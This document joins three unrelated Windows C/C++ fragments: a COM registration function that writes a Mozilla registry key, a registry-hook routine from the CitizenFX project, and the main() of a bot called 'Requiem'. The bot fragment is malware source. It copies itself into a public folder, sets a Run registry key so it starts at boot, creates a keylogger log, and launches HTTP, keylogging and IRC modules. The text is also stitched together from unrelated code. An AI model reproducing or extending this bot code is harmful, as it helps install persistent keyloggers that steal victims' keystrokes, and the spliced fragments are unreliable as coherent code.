extern "C" STDAPI DllRegisterServer() { WCHAR path[MAX_PATH]; GetModuleFileName(globalInstance_, path, sizeof(path)); DWORD path_size = (wcslen(path) + 1) * sizeof(WCHAR); RegSetKeyValue( HKEY_CURRENT_USER, MOZILLA_REG_KEY, L"Path", REG_SZ, path, path_size); return S_OK; }
LONG WINAPI ProcessLSPRegOpenKeyExA(HKEY key, const char* subKey, DWORD options, REGSAM samDesired, PHKEY outKey) { static thread_local HKEY lastLSPKey = (HKEY)-1; if (subKey) { if (!_stricmp(subKey, "AppId_Catalog")) { auto setValue = [&](const wchar_t* name, const wchar_t* keyString) { RegSetKeyValue(HKEY_CURRENT_USER, L"SOFTWARE\\CitizenFX\\AppID_Catalog", name, REG_SZ, keyString, (wcslen(keyString) * 2) + 2); }; wchar_t modulePath[512]; GetModuleFileName(GetModuleHandle(nullptr), modulePath, sizeof(modulePath) / sizeof(wchar_t)); setValue(L"AppFullPath", modulePath); DWORD permittedCategories = 0x80000000; RegSetKeyValue(HKEY_CURRENT_USER, L"SOFTWARE\\CitizenFX\\AppID_Catalog", L"PermittedLspCategories", REG_DWORD, &permittedCategories, sizeof(permittedCategories)); LONG status = g_origRegOpenKeyExA(HKEY_CURRENT_USER, "SOFTWARE\\CitizenFX\\AppID_Catalog", options, samDesired, outKey); lastLSPKey = *outKey; return status; } } if (key == lastLSPKey) { if (!strchr(subKey, L'-')) { LONG status = g_origRegOpenKeyExA(key, "", options, samDesired, outKey); lastLSPKey = (HKEY)-1; return status; } } return g_origRegOpenKeyExA(key, subKey, options, samDesired, outKey); }
int main() { HANDLE keylogFile, debugFile; char tempDirName[MAX_PATH]; sprintf(tempDirName, "%s\\%s", "C:\\Users\\Public", _folderName); //Store the folder location into tempDirName if (CreateDirectory(tempDirName, NULL)) { //If folder does not exist create it and create the debug file as well. char tempFileName[MAX_PATH]; char buffer[] = "[CORE]: Bot Started \n"; DWORD bytesWritten = 0; sprintf(tempFileName, "%s\\%s", tempDirName, _fileName); //Store whole path name in tempFileName debugFile = CreateFile(tempFileName, GENERIC_ALL, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL); //Create debug file WriteFile(debugFile, buffer, sizeof(buffer) - 1, &bytesWritten, NULL); //Write to debug file char modFileName[MAX_PATH]; //Get current exe path name so we can copy it to the new folder we created GetModuleFileName(NULL, modFileName, sizeof(modFileName)); char tempExeName[MAX_PATH]; //Set this equal to our new folder name + requiem as the exe name sprintf(tempExeName, "%s\\%s", tempDirName, "Requiem.exe"); if (CopyFile(modFileName, tempExeName, TRUE)) //Copy our current program into the new directory so it can be run at startup { char lpData[MAX_PATH];//Create registry key to autorun bot RegSetKeyValue(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Requiem", REG_SZ, (LPBYTE)&tempExeName, sizeof(tempExeName)); char bytesToWrite[] = "[CORE]: Registry Key Added \n"; //Write to debug file WriteFile(debugFile, bytesToWrite, sizeof(bytesToWrite) - 1, &bytesWritten, NULL); } } char tempKeylogFileName[MAX_PATH]; sprintf(keylogDir, "%s\\%s", tempDirName, _keylogFile); if (keylogHandle = CreateFile(keylogDir, GENERIC_ALL, FILE_SHARE_WRITE, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL)) { char buffer[] = "[CORE]: Keylogger started \n"; DWORD bytesWritten = 0; WriteFile(keylogHandle, buffer, sizeof(buffer) - 1, &bytesWritten, NULL); CloseHandle(keylogHandle); } //keylogHandle = CreateFile(tempKeylogFileName, GENERIC_ALL, FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); //module startups #ifdef RQHTTP_H http_startup(); #endif #ifdef KEYLOG_H keylog_startup(); #endif #ifdef RQIRC_H irc_startup(); #endif return 0; }